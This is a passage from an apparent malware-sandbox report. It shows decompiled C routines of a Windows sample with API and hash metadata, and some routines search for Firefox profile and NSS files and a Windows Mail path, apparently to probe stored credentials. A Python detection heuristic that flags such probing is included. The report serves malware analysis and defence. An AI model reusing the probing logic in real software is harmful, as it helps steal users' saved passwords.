				if(strlen(_a4) + _t13 < 0x104) {
					_t2 =  &_a4; // 0x410d64
					strcat(_t13 + __edi,  *_t2);
				}
				return _t12;
                                                  			}

                                                  APIs
                                                  • strlen.MSVCRT ref: 00406736
                                                  • strlen.MSVCRT ref: 00406741
                                                  • strcat.MSVCRT(00000000,dA,0000001C,00410D64,\Microsoft\Windows Mail,?,?,?), ref: 00406758
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000002.00000002.240465103.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000002.00000002.240481478.0000000000418000.00000040.00000001.sdmp
                                                  Yara matches
                                                  Similarity
                                                  • API ID: strlen$strcat
                                                  • String ID: dA
                                                  • API String ID: 2335785903-82490789
                                                  • Opcode ID: 8b0d949a9835eed74c78f3475c18959fb5a6152aa5369579c15a011cca720fff
                                                  • Instruction ID: 8adb96eafe51badce5d1f431fd236154b3227263db9247bb640c15329514921a
                                                  • Opcode Fuzzy Hash: 8b0d949a9835eed74c78f3475c18959fb5a6152aa5369579c15a011cca720fff
                                                  • Instruction Fuzzy Hash: EFD05E3350852036C5152316BC429DE5B82CBC037CB15445FF609921A1E93D84D1859D
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  C-Code - Quality: 89%
                                                  			E00402221(void* __ecx, intOrPtr _a4, char* _a8) {
                                                  				void* __ebx;
                                                  				intOrPtr _t22;
                                                  				void* _t23;
                                                  				void* _t25;
                                                  				void* _t27;
                                                  				void* _t29;
                                                  				void* _t32;
                                                  				void* _t36;
                                                  				signed short _t42;
                                                  				char* _t47;
                                                  				void* _t48;
                                                  				intOrPtr _t49;
                                                  				intOrPtr _t50;
                                                  				void* _t57;
                                                  
                                                  				_t22 = _a4;
                                                  				_t57 = _t22 - 6;
                                                  				_t47 = _a8;
                                                  				_t48 = __ecx;
                                                  				 *_t47 = 0;
                                                  				if(_t57 > 0) {
                                                  					_t23 = _t22 - 7;
                                                  					if(_t23 == 0) {
                                                  						return __ecx + 0x214;
                                                  					}
                                                  					_t25 = _t23 - 1;
                                                  					if(_t25 == 0) {
                                                  						return __ecx + 0x294;
                                                  					}
                                                  					_t27 = _t25 - 1;
                                                  					if(_t27 == 0) {
                                                  						return __ecx + 0x314;
                                                  					}
                                                  					_t29 = _t27 - 1;
                                                  					if(_t29 == 0) {
                                                  						_t49 =  *((intOrPtr*)(__ecx + 0x3a0));
                                                  						if(_t49 < 1 || _t49 > 7) {
                                                  							if(_t49 < 8 || _t49 > 0xe) {
                                                  								if(_t49 < 0xf || _t49 > 0x19) {
                                                  									if(_t49 < 0x1a || _t49 > 0x2d) {
                                                  										if(_t49 < 0x2e) {
                                                  											L16:
                                                  											return _t47;
                                                  										}
                                                  										_t42 = 0x519;
                                                  									} else {
                                                  										_t42 = 0x518;
                                                  									}
                                                  								} else {
                                                  									_t42 = 0x517;
                                                  								}
                                                  							} else {
                                                  								_t42 = 0x516;
                                                  							}
                                                  							goto L20;
                                                  						} else {
                                                  							_t42 = 0x515;
                                                  							L20:
                                                  							return E004078FF(_t42);
                                                  						}
                                                  					}
                                                  					_t32 = _t29 - 1;
                                                  					if(_t32 == 0) {
                                                  						return __ecx + 0x190;
                                                  					}
                                                  					if(_t32 != 1) {
                                                  						goto L16;
                                                  					}
                                                  					_t50 =  *((intOrPtr*)(__ecx + 0x39c));
                                                  					L14:
					if(_t50 != 0) {
						_push(0xa);
						_push(_t47);
						_push(_t50);
						L0041158E(); // _ultoa(_t50, _t47, 10) per the API ID below: decimal text into the caller's buffer
					}
                                                  					goto L16;
                                                  				}
                                                  				if(_t57 == 0) {
                                                  					_t42 =  *((intOrPtr*)(__ecx + 0x210)) + 0x320;
                                                  					goto L20;
                                                  				}
                                                  				if(_t22 == 0xfffffff6) {
                                                  					_t36 = E004078FF( *((intOrPtr*)(__ecx + 0x8c)) + 0x384);
                                                  					sprintf(_t47, "%s  %s  %s", E004078FF( *((intOrPtr*)(_t48 + 0x210)) + 0x320), _t48 + 0x110, _t36);
                                                  					goto L16;
                                                  				}
                                                  				if(_t22 == 0) {
                                                  					return __ecx + 0xc;
                                                  				}
                                                  				if(_t22 == 1) {
                                                  					_t42 =  *((intOrPtr*)(__ecx + 0x8c)) + 0x384;
                                                  					goto L20;
                                                  				}
                                                  				if(_t22 == 2) {
                                                  					return __ecx + 0x90;
                                                  				}
                                                  				if(_t22 == 3) {
                                                  					return __ecx + 0x110;
                                                  				}
                                                  				if(_t22 == 4) {
                                                  					_t50 =  *((intOrPtr*)(__ecx + 0x394));
                                                  					goto L14;
                                                  				}
                                                  				if(_t22 != 5) {
                                                  					goto L16;
                                                  				}
                                                  				if( *((intOrPtr*)(__ecx + 0x398)) == 0) {
                                                  					_push(0x10);
                                                  				} else {
                                                  					_push(0xf);
                                                  				}
                                                  				_pop(_t42);
                                                  				goto L20;
                                                  			}

                                                  APIs
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000002.00000002.240465103.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000002.00000002.240481478.0000000000418000.00000040.00000001.sdmp
                                                  Yara matches
                                                  Similarity
                                                  • API ID: _ultoasprintf
• String ID: %s  %s  %s
                                                  • API String ID: 432394123-3850900253
                                                  • Opcode ID: 7ea893eb970b9f9c330beb309c0cc5b8cf8f56ebc8930b7fcefd01bde23561b2
                                                  • Instruction ID: d9c328b9b741649d7ae815da5d558f3ae5f994b92098e95e7c9169487fd3f945
                                                  • Opcode Fuzzy Hash: 7ea893eb970b9f9c330beb309c0cc5b8cf8f56ebc8930b7fcefd01bde23561b2
                                                  • Instruction Fuzzy Hash: C4410932504B15C7C636956487CCBEBA264A742304F6508BFEC5AF72D1C2FCAD41976B
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  C-Code - Quality: 89%
                                                  			E0040D37A(intOrPtr* __ecx, void* __eflags, intOrPtr _a4, intOrPtr _a8) {
                                                  				char _v328;
                                                  				char _v652;
                                                  				char _v928;
                                                  				char _v1296;
                                                  				signed int _v1300;
                                                  				void* __esi;
                                                  				char* _t26;
                                                  				intOrPtr* _t43;
                                                  
				_v1300 = _v1300 | 0xffffffff;
				_v1296 = 0;
				_v328 = 0;
				_v652 = 0;
				_t43 = __ecx;
				// Enumerate every entry below _a4 with the "*.*" wildcard (FindFirstFile per the API ID below).
				E00406E68( &_v1300, __eflags, "*.*", _a4);
				while(E00406EC3( &_v1300) != 0) {
					__eflags = E00406E2D( &_v1300);
					if(__eflags == 0) {
						__eflags = _a8 - 1;
						// Entries are only compared with "prefs.js" (the Firefox profile file)
						// once the walk is more than one level below the start directory.
						if(_a8 > 1) {
							_t26 =  &_v928;
							_push("prefs.js");
							_push(_t26);
							L004115B2(); // import call on (&_v928, "prefs.js"); the path is only used when it returns zero
							__eflags = _t26;
							if(_t26 == 0) {
								__eflags = E0040614B( &_v652);
								if(__eflags != 0) {
									E0040D1EC(_t43, __eflags,  &_v652); // hand the located profile path on
								}
							}
						}
					} else {
						// Sub-directory: recurse with the depth counter incremented.
						_a8 = _a8 + 1;
						E0040D37A(_t43, __eflags,  &_v652, _a8);
					}
				}
				E00406F5B( &_v1300);
				return 1;
                                                  			}

                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000002.00000002.240465103.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000002.00000002.240481478.0000000000418000.00000040.00000001.sdmp
                                                  Yara matches
                                                  Similarity
                                                  • API ID: strlen$FileFindFirst
                                                  • String ID: *.*$prefs.js
                                                  • API String ID: 2516927864-1592826420
                                                  • Opcode ID: 3e701ac251ef0c92007320573df48c8a58c02c849dde9726d81be77e97480d08
                                                  • Instruction ID: f0fdac10561689b7590a9d658f3f63ad40faf00aab35cef1d8d79f75c7dff1a2
                                                  • Opcode Fuzzy Hash: 3e701ac251ef0c92007320573df48c8a58c02c849dde9726d81be77e97480d08
                                                  • Instruction Fuzzy Hash: 2711E731408349AAD720EAA5C8019DB77DC9F85324F00493FF869E21C1DB38E61E87AB
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%
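The routines in this part of the report spell out what the sample probes for on disk: a sqlite3.dll / nss3.dll path built next to a caller-supplied directory (top of this section), a recursive directory walk that stops on prefs.js once it is more than one level deep (E0040D37A), and a \Microsoft\Windows Mail path passed through the bounded strcat in E00406734. The following Python triage heuristic turns those strings into a check over a file-access trace: a process that touches two or more of these indicator families, without being the browser or mail client that legitimately owns them, is flagged. This is an added example for this report, not code from the sample, from the sandbox or from any of the tools named in the detection list. The FileEvent shape (pid, image, path), the legitimate-owner sets and every entry in SAMPLE_EVENTS are assumptions constructed for the example.

```python
"""Flag processes whose file activity matches the credential-store probing
seen in the decompiled routines above (prefs.js walk, sqlite3.dll / nss3.dll
path build, \\Microsoft\\Windows Mail path).

Added example for this report; not code from the sample or the sandbox.
FileEvent is an assumed shape modelled on a generic file-access trace such as
Sysmon event 11; SAMPLE_EVENTS are constructed, not taken from the report.
"""
from collections import defaultdict
from dataclasses import dataclass
import ntpath

# Indicator families taken from the strings referenced by the decompiled code.
# Each predicate runs over a lower-cased Windows path.
INDICATORS = {
    "firefox_profile": lambda p: ntpath.basename(p) == "prefs.js",
    "firefox_nss": lambda p: ntpath.basename(p) in ("sqlite3.dll", "nss3.dll"),
    "windows_mail": lambda p: "\\microsoft\\windows mail" in p,
}

# Processes expected to touch each family; their hits are not suspicious.
# Assumption: tune this to the estate being monitored.
LEGIT_OWNERS = {
    "firefox_profile": {"firefox.exe", "thunderbird.exe"},
    "firefox_nss": {"firefox.exe", "thunderbird.exe"},
    "windows_mail": {"winmail.exe"},
}


@dataclass(frozen=True)
class FileEvent:
    pid: int
    image: str  # process image file name, e.g. "firefox.exe"
    path: str   # full path of the file touched


def classify(path: str) -> set:
    """Return the indicator families a single path belongs to."""
    low = path.lower()
    return {tag for tag, pred in INDICATORS.items() if pred(low)}


def flag_credential_probing(events, min_families: int = 2) -> dict:
    """Map (pid, image) -> sorted indicator families for processes that hit
    at least `min_families` distinct families while not being the legitimate
    owner of those files. Two families are required so that a lone prefs.js
    read by an unknown process does not fire on its own."""
    hits = defaultdict(set)
    for ev in events:
        for tag in classify(ev.path):
            if ev.image.lower() not in LEGIT_OWNERS[tag]:
                hits[(ev.pid, ev.image)].add(tag)
    return {k: sorted(v) for k, v in hits.items() if len(v) >= min_families}


# Constructed trace: Firefox doing its own work, an unrelated document read,
# and a foreign process walking the profile tree the way E0040D37A does.
PROFILE = r"C:\Users\bob\AppData\Roaming\Mozilla\Firefox\Profiles\abc.default"
SAMPLE_EVENTS = [
    FileEvent(1234, "firefox.exe", PROFILE + r"\prefs.js"),
    FileEvent(1234, "firefox.exe", r"C:\Program Files\Mozilla Firefox\nss3.dll"),
    FileEvent(900, "explorer.exe", r"C:\Users\bob\Documents\notes.txt"),
    FileEvent(4312, "sample.exe", r"C:\Users\bob\AppData\Roaming\Mozilla\Firefox\Profiles\*.*"),
    FileEvent(4312, "sample.exe", PROFILE + r"\prefs.js"),
    FileEvent(4312, "sample.exe", r"C:\Program Files\Mozilla Firefox\sqlite3.dll"),
    FileEvent(4312, "sample.exe", r"C:\Users\bob\AppData\Local\Microsoft\Windows Mail\account.oeaccount"),
]

if __name__ == "__main__":
    for (pid, image), families in flag_credential_probing(SAMPLE_EVENTS).items():
        print(f"{image} (pid {pid}): {', '.join(families)}")
```

Requiring two families is what keeps the heuristic quiet on a normal Firefox session: the browser touches prefs.js and nss3.dll itself, so the owner exclusion alone is not enough on hosts where the browser runs under a renamed or side-loaded image. Raise `min_families` or add owners when a mail client that ships its own copies of the NSS libraries is in scope.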

                                                  C-Code - Quality: 100%
                                                  			E00406680(intOrPtr* __ebx, intOrPtr __ecx, char* __edi, intOrPtr _a4, intOrPtr _a8, intOrPtr _a12) {
                                                  				intOrPtr _v20;
                                                  				intOrPtr _v28;
                                                  				intOrPtr _v32;
                                                  				signed int _v36;
                                                  				signed int _v44;
                                                  				intOrPtr _v48;
                                                  				char* _v52;
                                                  				intOrPtr _v56;
                                                  				signed int _v64;
                                                  				intOrPtr _v68;
                                                  				intOrPtr _v76;
                                                  				struct tagOFNA _v80;
                                                  				intOrPtr _t23;
                                                  				intOrPtr* _t33;
                                                  				intOrPtr _t34;
                                                  				char* _t38;
                                                  
                                                  				_t38 = __edi;
                                                  				_t34 = __ecx;
                                                  				_t33 = __ebx;
                                                  				_t23 = 1;
                                                  				if(__ebx != 0) {
                                                  					_t23 =  *__ebx;
                                                  				}
                                                  				_v64 = _v64 & 0x00000000;
                                                  				_v44 = _v44 & 0x00000000;
                                                  				_v36 = _v36 & 0x00000000;
                                                  				_v56 = _t23;
                                                  				_v32 = _a8;
                                                  				_v20 = _a12;
                                                  				_v76 = _t34;
                                                  				_v80 = 0x4c;
                                                  				_v68 = _a4;
                                                  				_v52 = _t38;
                                                  				_v48 = 0x104;
                                                  				_v28 = 0x80806;
                                                  				if(GetSaveFileNameA( &_v80) == 0) {
                                                  					return 0;
                                                  				} else {
                                                  					if(_t33 != 0) {
                                                  						 *_t33 = _v56;
                                                  					}
                                                  					strcpy(_t38, _v52);
                                                  					return 1;
                                                  				}
                                                  			}

                                                  Instruction addresses for the decompiled lines above (in listing order): 0x00406680, 0x00406680, 0x00406680, 0x00406688, 0x0040668b, 0x0040668d, 0x0040668d, 0x0040668f, 0x00406693, 0x00406697, 0x0040669b, 0x004066a1, 0x004066a7, 0x004066aa, 0x004066b4, 0x004066bb, 0x004066be, 0x004066c1, 0x004066c8, 0x004066d7, 0x004066f5, 0x004066d9, 0x004066db, 0x004066e0, 0x004066e0, 0x004066e6, 0x004066f1, 0x004066f1

                                                  APIs
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000002.00000002.240465103.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                  • Associated: 00000002.00000002.240481478.0000000000418000.00000040.00000001.sdmp
                                                  Yara matches
                                                  Similarity
                                                  • API ID: FileNameSavestrcpy
                                                  • String ID: L
                                                  • API String ID: 1182090483-2909332022
                                                  • Opcode ID: 60ad435b05b414f2b30048372afc6468a300e5fb370a7e0e1bfb6bb36773f123
                                                  • Instruction ID: a38c0b8f1c2b7ba0f1b8aa2faef71ae79cae630a3543d59e66951d479f2b4fd1
                                                  • Opcode Fuzzy Hash: 60ad435b05b414f2b30048372afc6468a300e5fb370a7e0e1bfb6bb36773f123
                                                  • Instruction Fuzzy Hash: 7F0125B1E102199FDF00CFA9D8807AEBBF8FF08319F10442AE915E6280DBB88915CF44
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  C-Code - Quality: 100%
                                                  			E0040ADB3(void* __ebx, void* __eflags) {
                                                  				char _v265;
                                                  				char _v526;
                                                  				char _v787;
                                                  				void _v1048;
                                                  				void _v3648;
                                                  				intOrPtr _v3652;
                                                  				char _v3660;
                                                  				void* _t30;
                                                  
                                                  				_t30 = __ebx;
                                                  				_v3660 = 0x41300c;
                                                  				memset( &_v3648, 0, 0x10);
                                                  				_v1048 = 0;
                                                  				_v787 = 0;
                                                  				_v526 = 0;
                                                  				_v265 = 0;
                                                  				_v3652 = 0x6c;
                                                  				memcpy( &_v1048,  *((intOrPtr*)(__ebx + 0x370)) + 0xb20, 0x105 << 2);
                                                  				if(E00401596( &_v3660,  *((intOrPtr*)(__ebx + 0x108))) != 0) {
                                                  					E0040AD9D(memcpy( *((intOrPtr*)(__ebx + 0x370)) + 0xb20,  &_v1048, 0x105 << 2));
                                                  				}
                                                  				SetFocus( *( *((intOrPtr*)(_t30 + 0x370)) + 0x184));
                                                  				return E0040143D( &_v3660);
                                                  			}

                                                  Instruction addresses for the decompiled lines above (in listing order): 0x0040adb3, 0x0040adc9, 0x0040add3, 0x0040ade7, 0x0040adee, 0x0040adf5, 0x0040adfc, 0x0040ae03, 0x0040ae1e, 0x0040ae2d, 0x0040ae4a, 0x0040ae4a, 0x0040ae5b, 0x0040ae6f

                                                  APIs
                                                  • memset.MSVCRT ref: 0040ADD3
                                                  • SetFocus.USER32(?,?), ref: 0040AE5B
                                                    • Part of subcall function 0040AD9D: PostMessageA.USER32 ref: 0040ADAC
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000002.00000002.240465103.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                  • Associated: 00000002.00000002.240481478.0000000000418000.00000040.00000001.sdmp
                                                  Yara matches
                                                  Similarity
                                                  • API ID: FocusMessagePostmemset
                                                  • String ID: l
                                                  • API String ID: 3436799508-2517025534
                                                  • Opcode ID: aeb443fdb5aee6ef7c028d3e89b28528cc274f3a7ebb19c8f17c9a74365f91d9
                                                  • Instruction ID: a3aa1947760d1632b5ff20bf1b11b778d92a779fff19439862dc3abef3b95f30
                                                  • Opcode Fuzzy Hash: aeb443fdb5aee6ef7c028d3e89b28528cc274f3a7ebb19c8f17c9a74365f91d9
                                                  • Instruction Fuzzy Hash: 1011A1719002589BDF21AB14CC047CA7BAAAF80308F0804F5A94C7B292C7B55B88CFA9
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  C-Code - Quality: 100%
                                                  			E00408441(void** __esi, struct HWND__* _a4) {
                                                  				long _v12;
                                                  				signed int _v24;
                                                  				signed int _v28;
                                                  				short _v32;
                                                  				void* _v40;
                                                  				long _t17;
                                                  				short* _t23;
                                                  				int _t24;
                                                  				void** _t25;
                                                  
                                                  				_t25 = __esi;
                                                  				_t24 = 0;
                                                  				if(_a4 != 0) {
                                                  					_t17 = memset( *__esi, 0, __esi[1] << 2);
                                                  					if(__esi[1] > 0) {
                                                  						do {
                                                  							_v28 = _v28 & 0x00000000;
                                                  							_v24 = _v24 & 0x00000000;
                                                  							_t23 =  *_t25 + _t24 * 4;
                                                  							_v40 = 0x22;
                                                  							_t17 = SendMessageA(_a4, 0x1019, _t24,  &_v40);
                                                  							if(_t17 != 0) {
                                                  								 *_t23 = _v32;
                                                  								_t17 = _v12;
                                                  								 *(_t23 + 2) = _t17;
                                                  							}
                                                  							_t24 = _t24 + 1;
                                                  						} while (_t24 < _t25[1]);
                                                  					}
                                                  				}
                                                  				return _t17;
                                                  			}

                                                  Instruction addresses for the decompiled lines above (in listing order): 0x00408441, 0x00408449, 0x0040844e, 0x0040845a, 0x00408465, 0x00408467, 0x00408469, 0x0040846d, 0x00408471, 0x00408481, 0x00408488, 0x00408490, 0x00408496, 0x00408499, 0x0040849d, 0x0040849d, 0x004084a1, 0x004084a2, 0x00408467, 0x00408465, 0x004084aa

                                                  APIs
                                                  • memset.MSVCRT ref: 0040845A
                                                  • SendMessageA.USER32(?,00001019,00000000,?), ref: 00408488
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000002.00000002.240465103.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                  • Associated: 00000002.00000002.240481478.0000000000418000.00000040.00000001.sdmp
                                                  Yara matches
                                                  Similarity
                                                  • API ID: MessageSendmemset
                                                  • String ID: "
                                                  • API String ID: 568519121-123907689
                                                  • Opcode ID: 34401dede8e385bb68c53d7b6caaa6400c7ccd3c24b43ec3f913943d5d854be5
                                                  • Instruction ID: 3d4b9897b9e590d379032152458179bae83636b6f0047c21005e3f982915147a
                                                  • Opcode Fuzzy Hash: 34401dede8e385bb68c53d7b6caaa6400c7ccd3c24b43ec3f913943d5d854be5
                                                  • Instruction Fuzzy Hash: 4F01D635900205AFDB20CF95C941EAFB7F8FF84759F10842EE891AA240E738DA85CB75
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  C-Code - Quality: 100%
                                                  			E00406618(intOrPtr __eax, char* __esi, intOrPtr _a4, intOrPtr _a8) {
                                                  				intOrPtr _v20;
                                                  				intOrPtr _v28;
                                                  				intOrPtr _v32;
                                                  				intOrPtr _v36;
                                                  				intOrPtr _v44;
                                                  				intOrPtr _v48;
                                                  				char* _v52;
                                                  				intOrPtr _v56;
                                                  				intOrPtr _v64;
                                                  				intOrPtr _v68;
                                                  				intOrPtr _v76;
                                                  				struct tagOFNA _v80;
                                                  
                                                  				_v76 = __eax;
                                                  				_v68 = _a4;
                                                  				_v64 = 0;
                                                  				_v44 = 0;
                                                  				_v36 = 0;
                                                  				_v32 = _a8;
                                                  				_v80 = 0x4c;
                                                  				_v56 = 1;
                                                  				_v52 = __esi;
                                                  				_v48 = 0x104;
                                                  				_v28 = 0x81804;
                                                  				_v20 = 0x413008;
                                                  				if(GetOpenFileNameA( &_v80) == 0) {
                                                  					return 0;
                                                  				} else {
                                                  					strcpy(__esi, _v52);
                                                  					return 1;
                                                  				}
                                                  			}

                                                  Instruction addresses for the decompiled lines above (in listing order): 0x0040661e, 0x00406624, 0x00406629, 0x0040662c, 0x0040662f, 0x00406635, 0x0040663c, 0x00406643, 0x0040664a, 0x0040664d, 0x00406654, 0x0040665b, 0x0040666a, 0x0040667f, 0x0040666c, 0x00406670, 0x0040667b, 0x0040667b

                                                  APIs
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000002.00000002.240465103.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                  • Associated: 00000002.00000002.240481478.0000000000418000.00000040.00000001.sdmp
                                                  Yara matches
                                                  Similarity
                                                  • API ID: FileNameOpenstrcpy
                                                  • String ID: L
                                                  • API String ID: 812585365-2909332022
                                                  • Opcode ID: 005d7a4cd57d0344050e2e978546a456973b8179e79084affb1262c5eec5662a
                                                  • Instruction ID: 13dc2997c8553d865726dff807e233ea18e6c60b58d53e24b26ad6de5975139e
                                                  • Opcode Fuzzy Hash: 005d7a4cd57d0344050e2e978546a456973b8179e79084affb1262c5eec5662a
                                                  • Instruction Fuzzy Hash: 5201B2B1D10218AFCF40DFA9D8456CEBFF8BB08308F00812AE519E6240E7B886458F98
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  APIs
                                                  • LoadMenuA.USER32 ref: 00407BC1
                                                  • sprintf.MSVCRT ref: 00407BE4
                                                    • Part of subcall function 00407A64: GetMenuItemCount.USER32 ref: 00407A7A
                                                    • Part of subcall function 00407A64: memset.MSVCRT ref: 00407A9E
                                                    • Part of subcall function 00407A64: GetMenuItemInfoA.USER32 ref: 00407AD4
                                                    • Part of subcall function 00407A64: memset.MSVCRT ref: 00407B01
                                                    • Part of subcall function 00407A64: strchr.MSVCRT ref: 00407B0D
                                                    • Part of subcall function 00407A64: strcat.MSVCRT(?,?,?,?,?,00000001,?), ref: 00407B68
                                                    • Part of subcall function 00407A64: ModifyMenuA.USER32(?,?,00000400,?,?), ref: 00407B84
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000002.00000002.240465103.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                  • Associated: 00000002.00000002.240481478.0000000000418000.00000040.00000001.sdmp
                                                  Yara matches
                                                  Similarity
                                                  • API ID: Menu$Itemmemset$CountInfoLoadModifysprintfstrcatstrchr
                                                  • String ID: menu_%d
                                                  • API String ID: 3671758413-2417748251
                                                  • Opcode ID: e0b27bc8312c4869803a1ee04920a3f9795f2512d2491c73ec6fe14da36cbe17
                                                  • Instruction ID: 3be60505ea2565ef11dfa3f51dd36ce0e69a3f53bb310b440500eec60165980c
                                                  • Opcode Fuzzy Hash: e0b27bc8312c4869803a1ee04920a3f9795f2512d2491c73ec6fe14da36cbe17
                                                  • Instruction Fuzzy Hash: 9FD01D71A4D14037D72033356D09FCF19794BD3B15F5440A9F200722D1D57C5755857D
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  C-Code - Quality: 100%
                                                  			E00406325(char* _a4) {
                                                  
                                                  				if( *0x417550 == 0) {
                                                  					 *0x417658 = GetWindowsDirectoryA(0x417550, 0x104);
                                                  				}
                                                  				strcpy(_a4, 0x417550);
                                                  				return  *0x417658;
                                                  			}

                                                  Instruction addresses for the decompiled lines above (in listing order): 0x00406332, 0x00406340, 0x00406340, 0x0040634a, 0x00406357

                                                  APIs
                                                  • GetWindowsDirectoryA.KERNEL32(00417550,00000104,?,0040E228,00000000,?,00000000,00000104,00000104), ref: 0040633A
                                                  • strcpy.MSVCRT(00000000,00417550,?,0040E228,00000000,?,00000000,00000104,00000104), ref: 0040634A
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000002.00000002.240465103.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                  • Associated: 00000002.00000002.240481478.0000000000418000.00000040.00000001.sdmp
                                                  Yara matches
                                                  Similarity
                                                  • API ID: DirectoryWindowsstrcpy
                                                  • String ID: PuA
                                                  • API String ID: 531766897-3228437271
                                                  • Opcode ID: b1972f0ba22637c8055687d42c6acbfd742ac988b9f6313726f8896cebb56ee7
                                                  • Instruction ID: dc620c75b08fae7ca861cc569808ec9e0c9c78cdcec5c9dc17d9b47d99426002
                                                  • Opcode Fuzzy Hash: b1972f0ba22637c8055687d42c6acbfd742ac988b9f6313726f8896cebb56ee7
                                                  • Instruction Fuzzy Hash: D2D0A77184E2907FE3015728BC45AC63FB5DB05330F10807BF508A25A0E7741C90879C
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  C-Code - Quality: 100%
                                                  			E00408348(char* __esi) {
                                                  				char* _t2;
                                                  				char* _t6;
                                                  
                                                  				_t6 = __esi;
                                                  				E00406160(__esi);
                                                  				_t2 = strrchr(__esi, 0x2e);
                                                  				if(_t2 != 0) {
                                                  					 *_t2 = 0;
                                                  				}
                                                  				return strcat(_t6, "_lng.ini");
                                                  			}

                                                  Instruction addresses for the decompiled lines above (in listing order): 0x00408348, 0x00408349, 0x00408351, 0x0040835b, 0x0040835d, 0x0040835d, 0x0040836d

                                                  APIs
                                                    • Part of subcall function 00406160: GetModuleFileNameA.KERNEL32(00000000,00000104,00000104,0040834E,00000000,0040826C,?,00000000,00000104,?), ref: 0040616B
                                                  • strrchr.MSVCRT ref: 00408351
                                                  • strcat.MSVCRT(00000000,_lng.ini,00000000,00000104,?), ref: 00408366
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000002.00000002.240465103.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                  • Associated: 00000002.00000002.240481478.0000000000418000.00000040.00000001.sdmp
                                                  Yara matches
                                                  Similarity
                                                  • API ID: FileModuleNamestrcatstrrchr
                                                  • String ID: _lng.ini
                                                  • API String ID: 3097366151-1948609170
                                                  • Opcode ID: d4342e7cf2f2cd7acb0c5595099143b60559064a13119ecfeb2f3085bb136c0c
                                                  • Instruction ID: a8d2890f819e62600bf11f9c0364550bfc67884382c2ab22ce71db24782b6e2f
                                                  • Opcode Fuzzy Hash: d4342e7cf2f2cd7acb0c5595099143b60559064a13119ecfeb2f3085bb136c0c
                                                  • Instruction Fuzzy Hash: 37C01275686A5438D11622355E03B8F01454F52745F24409BF903391D6DE5D569141AE
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  C-Code - Quality: 100%
                                                  			E00403397(CHAR* _a4, CHAR* _a8, char _a12) {
                                                  
                                                  				_t2 =  &_a12; // 0x403428
                                                  				return GetPrivateProfileStringA("Server Details", _a8, 0x412466,  *_t2, 0x7f, _a4);
                                                  			}

                                                  Instruction addresses for the decompiled lines above (in listing order): 0x0040339d, 0x004033b5

                                                  APIs
                                                  • GetPrivateProfileStringA.KERNEL32(Server Details,?,Function_00012466,(4@,0000007F,?), ref: 004033AF
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000002.00000002.240465103.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                  • Associated: 00000002.00000002.240481478.0000000000418000.00000040.00000001.sdmp
                                                  Yara matches
                                                  Similarity
                                                  • API ID: PrivateProfileString
                                                  • String ID: (4@$Server Details
                                                  • API String ID: 1096422788-3984282551
                                                  • Opcode ID: 7bf2893a727a8b250936425436c2602b2102234e3c58862608b198b8383da292
                                                  • Instruction ID: 5387a3ffe087b7673ef104c15d829f3f0df010b9e50aa15a0af8b6122c5a167a
                                                  • Opcode Fuzzy Hash: 7bf2893a727a8b250936425436c2602b2102234e3c58862608b198b8383da292
                                                  • Instruction Fuzzy Hash: A0C04031544301FAC5114F909F05E4D7F516B54B40F118415B24450065C1E54574DB26
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  C-Code - Quality: 88%
                                                  			// Constructor-style routine: stores the vtable pointer 0x413320 in the object
                                                  			// passed in esi, calls E00406549 on it, then allocates four 0x14-byte sub-objects
                                                  			// with L004115D0 (operator new, ??2@YAPAXI@Z per the API ID below), zeroes each
                                                  			// one and sets 0x100 at its offset +0x10, storing the pointers at this+4 .. this+0x10.
                                                  			// L004115D0 returns in eax; the decompiler shows that register as the _t22 it
                                                  			// reuses in every null check, so each "if(_t22 == 0)" tests the fresh allocation.
                                                  			E004084CE(intOrPtr* __esi, void* __eflags) {
                                                  				intOrPtr* _t22;
                                                  				intOrPtr* _t31;
                                                  
                                                  				_t31 = __esi;
                                                  				 *__esi = 0x413320;
                                                  				_t22 = E00406549(0x1c8, __esi);
                                                  				_push(0x14);
                                                  				L004115D0();   // first sub-object, stored at this+4
                                                  				if(_t22 == 0) {
                                                  					_t22 = 0;
                                                  				} else {
                                                  					 *((intOrPtr*)(_t22 + 0xc)) = 0;
                                                  					 *_t22 = 0;
                                                  					 *((intOrPtr*)(_t22 + 4)) = 0;
                                                  					 *((intOrPtr*)(_t22 + 0x10)) = 0x100;
                                                  					 *((intOrPtr*)(_t22 + 8)) = 0;
                                                  				}
                                                  				_push(0x14);
                                                  				 *((intOrPtr*)(_t31 + 4)) = _t22;
                                                  				L004115D0();   // second sub-object, stored at this+8
                                                  				if(_t22 == 0) {
